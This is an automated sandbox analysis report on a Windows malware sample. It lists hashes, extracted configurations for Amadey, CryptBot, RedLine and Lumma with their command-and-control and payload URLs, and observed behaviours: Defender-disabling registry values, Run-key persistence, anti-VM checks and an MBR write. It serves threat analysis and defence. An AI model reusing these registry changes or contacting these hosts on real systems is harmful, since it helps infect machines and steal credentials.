Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-02-2025 06:39
Static task
static1
Behavioral task
behavioral1
Sample
2341120afd619b888c8316c0a91d39b8.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2341120afd619b888c8316c0a91d39b8.exe
Resource
win10v2004-20250217-en
General
-
Target
2341120afd619b888c8316c0a91d39b8.exe
-
Size
2.0MB
-
MD5
2341120afd619b888c8316c0a91d39b8
-
SHA1
a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7
-
SHA256
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b
-
SHA512
89cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b
-
SSDEEP
49152:LAHg7O11+U6WgTQv6Rw/HUtUXYeimDSD4ro:sHYO14UuQv6KHzj7E
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
cryptbot
http://home.fivecc5vs.top/RkxPTSBLYxNxxrPaLizI17
Extracted
redline
cheat
103.84.89.222:33791
Extracted
lumma
https://mercharena.biz/api
Signatures
-
Amadey family
-
Cryptbot family
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
resource yara_rule behavioral1/memory/668-477-0x0000000069CC0000-0x000000006A71B000-memory.dmp family_cryptbot_v3 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1592-114-0x0000000000860000-0x0000000000CBA000-memory.dmp healer behavioral1/memory/1592-115-0x0000000000860000-0x0000000000CBA000-memory.dmp healer behavioral1/memory/1592-170-0x0000000000860000-0x0000000000CBA000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp family_sectoprat behavioral1/memory/3368-1492-0x0000000000AB0000-0x0000000000F28000-memory.dmp family_sectoprat -
Sectoprat family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF dc4be0dfa1.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dc4be0dfa1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9b9b61ca89.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2341120afd619b888c8316c0a91d39b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b3513fa42a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 67839429c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 73a2489454.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1a76572772.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 294e1c6dae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 65b37014ac.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6405293e8c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0b87b998dd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 285919b33a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d71a31942b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b34dd26e42.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 3008 powershell.exe 12 2692 powershell.exe 121 1928 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 3008 powershell.exe 2692 powershell.exe 1928 powershell.exe 2780 powershell.exe 1936 powershell.exe 1240 powershell.exe 1884 powershell.exe -
Downloads MZ/PE file 17 IoCs
flow pid Process 11 2748 skotes.exe 11 2748 skotes.exe 11 2748 skotes.exe 11 2748 skotes.exe 11 2748 skotes.exe 214 3308 BitLockerToGo.exe 230 3936 BitLockerToGo.exe 10 3008 powershell.exe 78 880 futors.exe 9 2748 skotes.exe 9 2748 skotes.exe 9 2748 skotes.exe 9 2748 skotes.exe 9 2748 skotes.exe 12 2692 powershell.exe 121 1928 powershell.exe 120 996 BitLockerToGo.exe -
Uses browser remote debugging 2 TTPs 7 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1796 chrome.exe 2996 chrome.exe 2288 chrome.exe 3728 chrome.exe 3940 chrome.exe 3996 chrome.exe 3516 chrome.exe -
Checks BIOS information in registry 2 TTPs 38 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6405293e8c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b3513fa42a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b34dd26e42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d71a31942b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 65b37014ac.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6405293e8c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2341120afd619b888c8316c0a91d39b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1a76572772.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 285919b33a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2341120afd619b888c8316c0a91d39b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dc4be0dfa1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9b9b61ca89.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 294e1c6dae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 65b37014ac.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d71a31942b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0b87b998dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b34dd26e42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 73a2489454.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1a76572772.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b3513fa42a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 67839429c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0b87b998dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 73a2489454.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 285919b33a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dc4be0dfa1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 294e1c6dae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9b9b61ca89.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 67839429c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe -
Executes dropped EXE 41 IoCs
pid Process 2748 skotes.exe 1620 97b95b1f04.exe 1592 TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE 2124 b3513fa42a.exe 2180 483d2fa8a0d53818306efeb32d3.exe 668 dc4be0dfa1.exe 3044 b34dd26e42.exe 1240 d71a31942b.exe 2124 66c328e804.exe 1752 8f62e4017e.exe 2260 amnew.exe 880 futors.exe 2204 jROrnzx.exe 1696 jROrnzx.exe 3020 qFqSpAp.exe 1360 monthdragon.exe 904 monthdragon.exe 2280 9b9b61ca89.exe 2752 67839429c6.exe 2620 0b87b998dd.exe 316 73a2489454.exe 1920 7e0a6a635d.exe 1360 1a76572772.exe 2344 284e4384ff.exe 3392 Bjkm5hE.exe 3484 TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE 3532 Bjkm5hE.exe 3936 d2YQIJa.exe 3236 DTQCxXZ.exe 1312 service123.exe 3288 294e1c6dae.exe 3124 Ta3ZyUR.exe 3216 Ta3ZyUR.exe 3420 65b37014ac.exe 3428 7aencsM.exe 3244 7aencsM.exe 3376 7aencsM.exe 3460 7aencsM.exe 3368 6405293e8c.exe 4344 285919b33a.exe 4772 service123.exe -
Identifies Wine through registry keys 2 TTPs 19 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 2341120afd619b888c8316c0a91d39b8.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine d71a31942b.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 1a76572772.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 65b37014ac.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 294e1c6dae.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 6405293e8c.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine dc4be0dfa1.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine b34dd26e42.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 0b87b998dd.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 73a2489454.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 285919b33a.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine b3513fa42a.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 9b9b61ca89.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 67839429c6.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine d2YQIJa.exe -
Loads dropped DLL 64 IoCs
pid Process 1668 2341120afd619b888c8316c0a91d39b8.exe 1668 2341120afd619b888c8316c0a91d39b8.exe 2748 skotes.exe 3008 powershell.exe 3008 powershell.exe 2748 skotes.exe 2748 skotes.exe 2692 powershell.exe 2692 powershell.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 2260 amnew.exe 2748 skotes.exe 2204 jROrnzx.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2748 skotes.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 880 futors.exe 880 futors.exe 1360 monthdragon.exe 1988 WerFault.exe 1988 WerFault.exe 1988 WerFault.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 880 futors.exe 880 futors.exe 2748 skotes.exe 880 futors.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 1928 powershell.exe 1928 powershell.exe 3392 Bjkm5hE.exe 3588 WerFault.exe 3588 WerFault.exe 3588 WerFault.exe 2748 skotes.exe 2748 skotes.exe 2748 skotes.exe 668 dc4be0dfa1.exe 668 dc4be0dfa1.exe 3888 WerFault.exe 3888 WerFault.exe 3888 WerFault.exe 1312 service123.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\73a2489454.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10006970101\\73a2489454.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\7e0a6a635d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085413001\\7e0a6a635d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\1a76572772.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10006980101\\1a76572772.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\284e4384ff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085414001\\284e4384ff.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\97b95b1f04.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085378101\\97b95b1f04.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085379021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\67839429c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085411001\\67839429c6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\0b87b998dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085412001\\0b87b998dd.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 d71a31942b.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001945b-59.dat autoit_exe behavioral1/files/0x000500000001a502-815.dat autoit_exe behavioral1/files/0x000500000001a50d-841.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
pid Process 1668 2341120afd619b888c8316c0a91d39b8.exe 2748 skotes.exe 1592 TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE 2124 b3513fa42a.exe 2180 483d2fa8a0d53818306efeb32d3.exe 668 dc4be0dfa1.exe 3044 b34dd26e42.exe 1240 d71a31942b.exe 2280 9b9b61ca89.exe 2752 67839429c6.exe 2620 0b87b998dd.exe 316 73a2489454.exe 1360 1a76572772.exe 3484 TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE 3936 d2YQIJa.exe 3288 294e1c6dae.exe 3420 65b37014ac.exe 3368 6405293e8c.exe 4344 285919b33a.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 2204 set thread context of 1696 2204 jROrnzx.exe 68 PID 1360 set thread context of 904 1360 monthdragon.exe 74 PID 2124 set thread context of 408 2124 66c328e804.exe 87 PID 2280 set thread context of 996 2280 9b9b61ca89.exe 95 PID 3392 set thread context of 3532 3392 Bjkm5hE.exe 120 PID 1360 set thread context of 3308 1360 1a76572772.exe 128 PID 3124 set thread context of 3216 3124 Ta3ZyUR.exe 137 PID 3288 set thread context of 3936 3288 294e1c6dae.exe 142 PID 3428 set thread context of 3460 3428 7aencsM.exe 147 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 2341120afd619b888c8316c0a91d39b8.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 2132 2204 WerFault.exe 66 2780 3020 WerFault.exe 71 1988 1360 WerFault.exe 73 3588 3392 WerFault.exe 118 3888 668 WerFault.exe 59 3208 3124 WerFault.exe 136 336 3428 WerFault.exe 143 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f62e4017e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 284e4384ff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 66c328e804.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0b87b998dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 285919b33a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b3513fa42a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b34dd26e42.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1a76572772.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7e0a6a635d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6405293e8c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 294e1c6dae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 65b37014ac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 7e0a6a635d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2341120afd619b888c8316c0a91d39b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 7e0a6a635d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 67839429c6.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
